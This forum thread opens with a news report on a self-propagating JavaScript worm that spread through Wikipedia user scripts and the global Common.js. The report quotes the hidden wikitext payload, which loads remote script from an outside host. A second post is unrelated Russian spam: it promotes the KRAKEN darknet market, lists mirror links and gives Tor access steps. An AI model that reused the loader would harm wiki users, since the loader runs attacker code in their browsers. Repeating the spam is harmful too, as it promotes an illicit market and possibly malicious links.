News Wikipedia hit by self-propagating JavaScript Worm that vandalized Pages.


Fixxx

Moder
Joined
20.08.24
Messages
1,096
Reaction score
4,259
Points
113
The Wikimedia Foundation suffered a security incident today after a self-propagating JavaScript worm began vandalizing pages and modifying user scripts across multiple wikis. Editors first reported the incident on Wikipedia's Village Pump (technical), where users noticed a large number of automated edits adding hidden scripts and vandalism to random pages. Wikimedia engineers temporarily restricted editing across projects while they investigated the attack and began reverting changes.


The JavaScript worm

According to Wikimedia's Phabricator issue tracker, it appears the incident started after a malicious script hosted on Russian Wikipedia was executed, causing a global JavaScript script on Wikipedia to be modified with malicious code. The malicious script was stored at User:Ololoshka562/test.js [Archive], first uploaded in March 2024 and allegedly associated with scripts used in previous attacks on wiki projects. Based on edit histories the script is believed to have been executed for the first time by a Wikimedia employee account earlier today while testing user-script functionality. It is not currently known whether the script was executed intentionally, accidentally loaded during testing, or triggered by a compromised account. MediaWiki allows both global and user-specific JavaScript files, such as MediaWiki:Common.js and User:<username>/common.js, which are executed in editors’ browsers to customize the wiki interface. After the initial test.js script was loaded in a logged-in editor's browser, it attempted to modify two scripts using that editor's session and privileges:
  • User-level persistence: it tried to overwrite User:<username>/common.js with a loader that would automatically load the test.js script whenever that user browses the wiki while logged in.
  • Site-wide persistence: If the user had the right privileges, it would also edit the global MediaWiki:Common.js script, so that it would run for every editor that uses the global script.

1773125193799.png
*code to inject a self-propagating JavaScript worm into the MediaWiki:Common.js script.

If the global script was successfully modified, anyone loading it would automatically execute the loader, which would then repeat the same steps, including infecting their own common.js, as shown below.

1773125267388.png
*a Wikimedia user's infected common.js script.

The script also includes functionality to edit a random page by requesting one via the Special:Random wiki command, then editing the page to insert an image and the following hidden JavaScript loader.

Code:[[File:Woodpecker10.jpg|5000px]]
<span style="display:none">
[[#%3Cscript%3E$.getScript('//basemetrika.ru/s/e41')%3C/script%3E]]
</span>

Approximately 3,996 pages were modified, and around 85 users had their common.js files replaced during the security incident. It is unknown how many pages were deleted.

1773125303773.png
*pages modified by JavaScript worm.

As the worm spread, engineers temporarily restricted editing across projects while reverting the malicious changes and removing references to the injected scripts. During the cleanup, Wikimedia Foundation staff members also rolled back the common.js for numerous users across the platform. These modified pages have now been "supressed" and are no longer visible in the change histories. At the time of writing, the injected code has been removed, and editing is once again possible. However, Wikimedia has not yet published a detailed post-incident report explaining exactly how the dormant script was executed or how widely the worm propagated before it was contained.
 

GqeuMoito

Newbie
Joined
17.04.26
Messages
107
Reaction score
0
Points
6
Для вашего удобства мы собрали действующие и безопасные способы входа на ресурс KRAKEN.
Ниже представлены официальные и резервные зеркала платформы KRAKEN, которые гарантируют стабильный доступ.

Список рабочих адресов KRAKEN для перехода:

Первое официальное зеркало KRAKEN: https://kra-2025.cc

Новые зеркала:

https://swypevape.us/
https://eunoiatoday.com
https://lakewinchristiancenter.org
https://cataract-surgery-london.com
https://www.ruralsatelliteservices.com
https://academiaproaudio.com
https://rollingadventureholidays.com
https://richardwilmotproductions.com
https://sanemguvercin.com
https://fluminvestments.com
https://clagsi.dk
https://zpc.it
https://thomaslong.net
https://anjabarth.com
https://swypevape.us
https://sticker108.com
https://anjabarth.com
https://scbn.pl

Подробная инструкция KRAKEN по безопасному входу и использованию:
Подготовка браузера для доступа к KRAKEN. Для корректной и анонимной работы площадки KRAKEN требуется специальный обозреватель. Рекомендуем скачать и установить Tor Browser с официального сайта проекта Tor. Это ключевой шаг для обеспечения конфиденциальности при доступе к KRAKEN, так как браузер направляет ваш трафик через распределенную сеть серверов, скрывая ваше местоположение и активность.
Запуск и подключение к сети для KRAKEN. После установки откройте Tor Browser и дождитесь полного подключения к сети. Иконка в верхней части окна браузера покажет статус соединения. Этот процесс может занять от нескольких секунд до пары минут перед входом на KRAKEN. Убедитесь, что подключение установлено успешно.
Переход на сайт KRAKEN. В адресной строке запущенного браузера введите один из актуальных адресов KRAKEN, указанных выше (например, ,Lhttps://krakr.cc или ,Lhttps://krakr.cc), и перейдите по нему. Будьте внимательны и точно копируйте адрес, чтобы избежать фишинговых сайтов.
Регистрация или авторизация на KRAKEN. На открывшейся главной странице KRAKEN вы сможете создать новую учетную запись, указав уникальный логин и надежный, сложный пароль, или войти в существующий аккаунт KRAKEN, используя свои учетные данные. Настоятельно рекомендуем сразу после регистрации на KRAKEN активировать двухфакторную аутентификацию (2FA) в настройках профиля. Это добавит дополнительный уровень безопасности, требующий ввода одноразового кода при каждом входе, и защитит ваш аккаунт KRAKEN от несанкционированного доступа.

Важные меры безопасности при работе с KRAKEN:
Используйте только свежие ссылки KRAKEN. Адреса зеркал KRAKEN могут обновляться для обеспечения работоспособности и безопасности. Всегда проверяйте их актуальность в проверенных источниках, чтобы избежать мошеннических сайтов, маскирующихся под KRAKEN. Не сохраняйте ссылки в закладках надолго без проверки.
Дополните анонимность VPN для доступа к KRAKEN. Для создания дополнительного, усиленного уровня защиты вашего соединения с KRAKEN рекомендуется использовать надежный VPN-сервис совместно с Tor. Это скроет от вашего интернет-провайдера факт использования сети Tor и добавит еще один шифрованный туннель для вашего трафика, что особенно важно в регионах с повышенным вниманием к подобной активности.
Проверяйте репутацию контрагентов на KRAKEN. Перед совершением любой сделки на KRAKEN внимательно изучайте историю продавца, статистику завершенных сделок и отзывы других пользователей. Надежные продавцы на KRAKEN обычно имеют долгую историю и высокий рейтинг. Это значительно снижает потенциальные риски и помогает избежать мошенничества. Не игнорируйте систему гарантов или условного депонирования (escrow), которую предлагает KRAKEN для защиты покупателей.
Критически оценивайте информацию. Будьте осторожны с предложениями, которые выглядят слишком выгодными, чтобы быть правдой. Используйте внутреннюю систему обмена сообщениями на KRAKEN для уточнения деталей и никогда не переходите к внешним каналам связи по настоянию продавца, так как это стандартная тактика мошенников для обхода защиты площадки KRAKEN.

Почему пользователи выбирают площадку KRAKEN?
Маркетплейс KRAKEN заслужил доверие многочисленной аудитории благодаря сочетанию ключевых факторов. Во-первых, это широкий и разнообразный ассортимент, представленный сотнями продавцов. Во-вторых, интуитивно понятный интерфейс KRAKEN, который упрощает навигацию, поиск товаров и управление заказами даже для новых пользователей. В-третьих, продуманная система безопасных транзакций, включающая механизмы разрешения споров (диспутов) и возможность использования условного депонирования, что минимизирует риски для обеих сторон сделки. На KRAKEN функциональность сочетается с внимательным отношением к безопасности клиентов, что делает процесс покупок более предсказуемым, защищенным и, как следствие, популярным среди пользователей, ценящих анонимность и надежность.

Популярные поисковые запросы, связанные с доступом к KRAKEN:

Быстрый алгоритм действий для доступа к KRAKEN:
1. Установите Tor Browser с официального сайта.
2. Откройте браузер и дождитесь успешного подключения к сети Tor.
3. В адресной строке введите актуальный адрес KRAKEN: https://rollingadventureholidays.com
4. Пройдите регистрацию, создав уникальный логин и сложный пароль, или авторизуйтесь в системе KRAKEN.
Немедленно включите двухфакторную аутентификацию в настройках вашего профиля KRAKEN.
Для максимальной анонимности рассмотрите возможность использования VPN-сервиса перед запуском Tor Browser.
Всегда проверяйте репутацию продавца по отзывам и рейтингу перед совершением сделки на KRAKEN.


kraken darknet ссылка
кракен зеркала
как зайти на кракен
ссылка на кракен
kraken tor
 
Top Bottom